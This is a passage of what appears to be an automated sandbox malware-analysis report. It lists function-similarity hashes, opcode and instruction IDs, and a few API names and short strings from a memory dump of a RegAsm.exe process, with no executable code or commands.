                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RuA
                                                                          • API String ID: 0-3286949753
                                                                          • Opcode ID: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                                                          • Instruction ID: 812d55878a62f6fab66defe66c88ae53172d99736bf38563795d352ae53827f1
                                                                          • Opcode Fuzzy Hash: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                                                          • Instruction Fuzzy Hash: 8CB10234208701CFE7258F29D851B73B7F2EB4A711F1489ADD4968B392D738A882CB58
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x%
                                                                          • API String ID: 0-3980080454
                                                                          • Opcode ID: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
                                                                          • Instruction ID: 53925fe815e81de9676dfe4c3668865c11de61aed011eb2c10e86570e61a59d5
                                                                          • Opcode Fuzzy Hash: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
                                                                          • Instruction Fuzzy Hash: 7BA145B1604320ABCB10DF24DC91B6777E4FF94358F08492DEA858B391E7B9E905C766
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: "
                                                                          • API String ID: 0-123907689
                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                          • Instruction ID: 1b0d155936ea343f35509df964668f6b6c6c9246b28269455b7de3af52c0cfb1
                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                          • Instruction Fuzzy Hash: D271E632B183254BD714CE28E58031BBBE3ABC5710F99856EE9949B391D238EC55C78B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1_B
                                                                          • API String ID: 0-2132359058
                                                                          • Opcode ID: ebd4713a8c839dd888d4ddf57068d90824b288b6a5d2fb2c475a76c4d08f8f2d
                                                                          • Instruction ID: 5b09de0f708086b2db089408e795921656c95d083517461b5049a84f32a7c51a
                                                                          • Opcode Fuzzy Hash: ebd4713a8c839dd888d4ddf57068d90824b288b6a5d2fb2c475a76c4d08f8f2d
                                                                          • Instruction Fuzzy Hash: D8415972D09B7487C230DA64A81017BB6D5DB85310F9A847FF9C697342EB38AD01A7CA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CUUI
                                                                          • API String ID: 0-173970609
                                                                          • Opcode ID: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
                                                                          • Instruction ID: 633f9cfe08b78efd1148aada0c0c4a0bea52aba14bf5254293374e99ea80dff2
                                                                          • Opcode Fuzzy Hash: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
                                                                          • Instruction Fuzzy Hash: 9541E7A020C7E08ADB358F2594903ABBBE1DFD3304F5884ADC6C56B243C77988068B5A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: cba`
                                                                          • API String ID: 2994545307-1926275841
                                                                          • Opcode ID: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
                                                                          • Instruction ID: beb69707a00ddb1e0f288a180930159145dfafadf277c1aff9f3426dfcb85bde
                                                                          • Opcode Fuzzy Hash: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
                                                                          • Instruction Fuzzy Hash: 47113536A44B204BC324CE289DC163777E1AB95314F95263DDCA9D33A1E278EC009AD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
                                                                          • Instruction ID: af49202ca076376fa415bca2a3091a328854806cafe53c7e33487b358e5641c5
                                                                          • Opcode Fuzzy Hash: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
                                                                          • Instruction Fuzzy Hash: 9722B332A087118BD725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B851CB47
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
                                                                          • Instruction ID: a0fb517757f1b8da7777bae7579d9f52a382c29ac2183c4fd28747a7d9f1db1e
                                                                          • Opcode Fuzzy Hash: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
                                                                          • Instruction Fuzzy Hash: F402127AB04216CFC704CF28E8906AAB7F2FB8A311F1A847ED58593351D734AD55CB86
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d076b9d010211f014a59fe34b7121c93ea0654b322b9de3976980b709a020c0e
                                                                          • Instruction ID: 0188f3e029ce03e8205a7a452b25b6dbd5bcd661a0513372e50984eaaf58ab41
                                                                          • Opcode Fuzzy Hash: d076b9d010211f014a59fe34b7121c93ea0654b322b9de3976980b709a020c0e
                                                                          • Instruction Fuzzy Hash: 98E12F79B04216CFC704CF68E8906AAB7F2FB8A312F1A847EE585D3351D334A955CB85
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
                                                                          • Instruction ID: 292f23283d7cd07bb6fd19c8603031892cd16be448e450c68c3e166b8ce1a4f1
                                                                          • Opcode Fuzzy Hash: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
                                                                          • Instruction Fuzzy Hash: DAF1CF356087418FD724CF29C88066BFBE2EFD9304F08882EE5D597791E679E904CB5A
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 536c392115e0cff150cd0d6d8dc87b4614f7e511d1c43d6d4655b511f952909a
                                                                          • Instruction ID: b7c2eaf3338182462aad9b41d84ad1057b9f4e6ab3b7739cdaab2d2094e4d2b6
                                                                          • Opcode Fuzzy Hash: 536c392115e0cff150cd0d6d8dc87b4614f7e511d1c43d6d4655b511f952909a
                                                                          • Instruction Fuzzy Hash: 36C1007AA04216CFC704CF28E8906AAB7F2FB8A311F1A447DE98593351D734ED54CB85
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0698e5323aca3189bcf61449c470d5166dbf916172f2457ca70a618e1c4aeee2
                                                                          • Instruction ID: 56b07d3b8ecf2697cfceb0b79347f06369642de1c8fee68a0e9743baf01ab03d
                                                                          • Opcode Fuzzy Hash: 0698e5323aca3189bcf61449c470d5166dbf916172f2457ca70a618e1c4aeee2
                                                                          • Instruction Fuzzy Hash: 46C12EB060D3218AC314DF14D86272BB7F2EF92364F44891DF0D19B395EB789905CB9A
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b7ae3e85a33d43a6e2771b0fd908fe387ca734c2f104cbcf9b416a7aefdf7c9a
                                                                          • Instruction ID: 20c8691d40d2db25294344e9a87d3a2a4619c2758e90d916e0ff6e9b3fbd9dce
                                                                          • Opcode Fuzzy Hash: b7ae3e85a33d43a6e2771b0fd908fe387ca734c2f104cbcf9b416a7aefdf7c9a
                                                                          • Instruction Fuzzy Hash: 95B1FE7AA14216CFC704CF68E8906AAB7F1FB8A311F1A447EE98693350D734ED54CB85
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fc05906a2cd7047f79f16b5ec2f82067cc14c0beb5821a18253c96a7a105a64b
                                                                          • Instruction ID: 02c91c5c175dbfc798e5ae80a92b3f6d79b9f3e28c5cee1d4de64ad44bd3bbdb
                                                                          • Opcode Fuzzy Hash: fc05906a2cd7047f79f16b5ec2f82067cc14c0beb5821a18253c96a7a105a64b
                                                                          • Instruction Fuzzy Hash: 28B1FE79A08216CFC704CF28E8906AAB7F1FB8A311F1A487DE985D3350D734E955CB95
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 71e2b72de9db90adf160ba091cc0f4e0f3ea60225d0eeabf88c335e2ed5b0d7e
                                                                          • Instruction ID: 5a7d6a52498181c9cf4f87941996139a214d8b31775e9e11dc627d5a44ad725e
                                                                          • Opcode Fuzzy Hash: 71e2b72de9db90adf160ba091cc0f4e0f3ea60225d0eeabf88c335e2ed5b0d7e
                                                                          • Instruction Fuzzy Hash: 73A143B46047418FD724CF29C8D1B63B7E2AB5A304F14892ED59A87792D338E886CB58
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b7535c463ae1e5bcf3702ce14ffd2b5f638eb3eed67e07491a9c0359b24ec7dd
                                                                          • Instruction ID: 9eaef7f6449a926bdd011e6bf6c7dc343cb48eef6fbbacc1f9e318c96c7b604e
                                                                          • Opcode Fuzzy Hash: b7535c463ae1e5bcf3702ce14ffd2b5f638eb3eed67e07491a9c0359b24ec7dd
                                                                          • Instruction Fuzzy Hash: 6891DF356053118BC718DF1AC890A2BB3F6EF9D710F19996DE8858B391E734EC01CB86
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
                                                                          • Instruction ID: 0033b059549c864885c35c4736f174911fb7ab2e2a7e13fdb612373215023671
                                                                          • Opcode Fuzzy Hash: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
                                                                          • Instruction Fuzzy Hash: 939168B2A083558FC714CF25945226FF7A2AFD1304F98892EE4E687382D639DD05CB4A
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
                                                                          • Instruction ID: 79a636d4ef35a115cd61f203c964b336e8654c9833e22f85933b964d871e8aad
                                                                          • Opcode Fuzzy Hash: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
                                                                          • Instruction Fuzzy Hash: 824113B455835287CB209F289C413BBF3F1AFA2358F59455EE8C597380E738D992C36A
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                                                          • Instruction ID: cd3817f91458a04e6f4698fbdec964a5fe2b941d70aabd782eb82a79c60357af
                                                                          • Opcode Fuzzy Hash: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                                                          • Instruction Fuzzy Hash: 4751EBB060C3208AC720DF60E49132BB7F0EFA2344F40492DD9D64B761EB799908DB9B
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                                                          • Instruction ID: 8a214a05a26fc8f928125f8fb48cb90f3e515442b7647201508495c5dbe42c78
                                                                          • Opcode Fuzzy Hash: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                                                          • Instruction Fuzzy Hash: DA4127B2B193504BD71CCF258CA275FFBA2EBC5308F16883DE5869B284CA7494078B45
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                                                          • Instruction ID: 504e49b0b2ddc2a099550f91d12c5185d5b4ceea0bdb26274afb8cde00bc0dbb
                                                                          • Opcode Fuzzy Hash: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                                                          • Instruction Fuzzy Hash: B5314632A083385B83249E5D8982067F7E8EBCD714F1AE12FD884E7311E574ED0147C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                                                          • Instruction ID: d5ab4806ffe72a1369b891b0c03ce99b48dccca7df38fd9f7e726c1ee5c76a78
                                                                          • Opcode Fuzzy Hash: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                                                          • Instruction Fuzzy Hash: 250124347A0A01DBE7258B15A891BB37293FB82310FA49029E18293281DB69AC91875D
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                          • Instruction ID: fc3937f92bddd9b9036211213233e27d23e83f380f16c5f831fb688d5273015d
                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                          • Instruction Fuzzy Hash: 8E11EC336051D40EC3158D3C84005A5BF930AD7234F59939AF4B4972E6D62A9D8B8359
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                                                          • Instruction ID: 81ebb7552e56e7d5adf40a514b1d7c04d719dbb311c9cbdb1d4034df3b6f2776
                                                                          • Opcode Fuzzy Hash: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                                                          • Instruction Fuzzy Hash: D601D4F5B00B1147D7309E11A5C0B27B2A9AF8070CF59443EED4467342DB7EEC28C69A
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                                                          • Instruction ID: dad6f7438d27f99e102fe50886f5565f1d4720bfb2582f27d129ae765fd9d515
                                                                          • Opcode Fuzzy Hash: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                                                          • Instruction Fuzzy Hash: EEF0E937B1551607A214DD26ACC453BB366D7C6314B295439E841E3281C979F80692B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                                                          • Instruction ID: c74ae76d4aeefb6f888da0d67bba939e79ddb671e6929748130615be24dd088f
                                                                          • Opcode Fuzzy Hash: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                                                          • Instruction Fuzzy Hash: E6D022789048005BC608EB10EE12639B2688F4B2AEF00303DE443FF353CE38EC60890E
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                                                          • Instruction ID: 52fe0259059b82c7cb9fb3d0f913ef24527c2e8030ec2916e1bb67edfa7a0227
                                                                          • Opcode Fuzzy Hash: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                                                          • Instruction Fuzzy Hash: 01D0122494A2994AD3068F389CA1731BBB1EF03100F442558D142DB291C7D09016865C
                                                                          APIs
                                                                          • CopyFileW.KERNEL32(00000000,?,00000000), ref: 00427607
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: CopyFile
                                                                          • String ID: <vB$B\$JC$OR
                                                                          • API String ID: 1304948518-1094185596
                                                                          • Opcode ID: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                                                          • Instruction ID: 8ef9865115e3bd1ef4dc2c2120f56385b28599b8e62f1996c0c1473ca8bdbd32
                                                                          • Opcode Fuzzy Hash: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                                                          • Instruction Fuzzy Hash: 802180B964D340DFD3209F61A84671BBBF4FB86304F40582CE1D587291EB788515DB4A